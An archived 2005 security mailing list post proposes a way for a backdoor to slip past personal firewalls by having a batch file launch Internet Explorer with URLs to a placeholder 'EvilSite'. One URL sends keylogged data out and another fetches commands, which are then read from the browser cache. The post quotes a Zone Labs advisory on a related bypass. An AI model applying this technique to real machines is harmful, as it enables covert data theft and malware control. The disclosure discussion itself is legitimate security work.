| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon Oct 3 19:26:42 2005 From: gautam.bipin at gmail.com (Bipin Gautam) Subject: Bypassing Personal Firewall, is it that* hard? hello list, Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is Bypassing Personal Firewall & let an internal (evil) application communicate with the external world, the hard. I mean... OK try this........ Lets.. me give you a simple concept. I'll call it 'passive communication' ( in lack of better world) say... a backdoor want to communicate to its server... It can do is,.... use a trusted internal application to do the job. Suppose; it creates a batch file run the batch file (evil.bat) & executes this command ....Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__ the batch file will get executed & Internet explorer will happily send the DATA. This trick can be used to send OUTPUT as well as get input... without trigering the firewall. To get input; the backdoor can do is... say, run similar BAT script: ....Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS well... the history of the page www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE cache... Then the backdoor can do is... RUN a string based 'GREP' in the IE cache & see if there is any new job to acomplish. just a rough theory... but ya its POSSIBLE; to let a internal backdoor have I/O with its server without trigering the firewall alert.... --------------- yap it does work... using the same trick can't the backdoor happily communicate with its server using the trick On 9/30/05, Zone Labs Security Team <security@...elabs.com> wrote: > Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro) > Using DDE-IPC" > > Overview: > > Debasis Mohanty published a notice about a potential security issue > with personal firewalls to several security email lists on > September 28th, 2005. Zone Labs has investigated his claims > and has determined that current versions of Zone Labs and > Check Point end-point security products are not vulnerable. > > > Description: > > The proof-of-concept code published uses the Windows API function > ShellExecute() to launch a trusted program that is used to access > the network on behalf of the untrusted program, thereby accessing > the network without warning from the firewall. > > > Impact: > > If successfully exploited, a malicious program may be able to > access the network via a trusted program. The ability to > access the network would be limited to the functionality of the > trusted program. > > > Unaffected Products: > > ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security, > and ZoneAlarm Security Suite version 6.0 or later automatically > protect against this attack in the default configuration. > > ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security, > and ZoneAlarm Security Suite version 5.5 are protected against > this attack by enabling the "Advanced Program Control" feature. > > Check Point Integrity client versions 6.0 and 5.5 are protected > against this attack by enabling the "Advanced Program Control" feature. > > > Affected Products: > > ZoneAlarm free versions lack the "Advanced Program Control" > feature and are therefore unable to prevent this bypass technique. > > > Recommended Actions: > > Subscribers should upgrade to the latest version of their > ZoneAlarm product or enable the "Advanced Program Control" feature. > > > Related Resources: > > Zone Labs Security Services http://www.zonelabs.com/security > > > Contact: > > Zone Labs customers who are concerned about this vulnerability or > have additional technical questions may reach our Technical Support > group at: http://www.zonelabs.com/support/. > > To report security issues with Zone Labs products contact > security@...elabs.com. Note that any other matters sent to this > email address will not receive a response. > > > Disclaimer: > > The information in the advisory is believed to be accurate at the > time of publishing based on currently available information. Use > of the information constitutes acceptance for use in an AS IS > condition. There are no warranties with regard to this information. > Neither the author nor the publisher accepts any liability for any > direct, indirect, or consequential loss or damage arising from use > of, or reliance on, this information. Zone Labs and Zone Labs > products, are registered trademarks of Zone Labs LLC. and/or > affiliated companies in the United States and other countries. > All other registered and unregistered trademarks represented in > this document are the sole property of their respective > companies/owners. > > Copyright: (c)2005 Zone Labs LLC All rights reserved. Zone Labs, > TrueVector, ZoneAlarm, and Cooperative Enforcement are registered > trademarks of Zone Labs LLC The Zone Labs logo, Check Point > Integrity and IMsecure are trademarks of Zone Labs, LLC. Check Point > Integrity protected under U.S. Patent No. 5,987,611. Reg. U.S. Pat. > & TM Off. Cooperative Enforcement is a service mark of Zone Labs LLC. > All other trademarks are the property of their respective owners. > Any reproduction of this alert other than as an unmodified copy of > this file requires authorization from Zone Labs. Permission to > electronically redistribute this alert in its unmodified form is > granted. All other rights, including the use of other media, are > reserved by Zone Labs LLC. -- Bipin Gautam Zeroth law of security: The possibility of poking a system from lower privilege is zero unless & until there is possibility of direct, indirect or consequential communication between the two...
Powered by blists - more mailing lists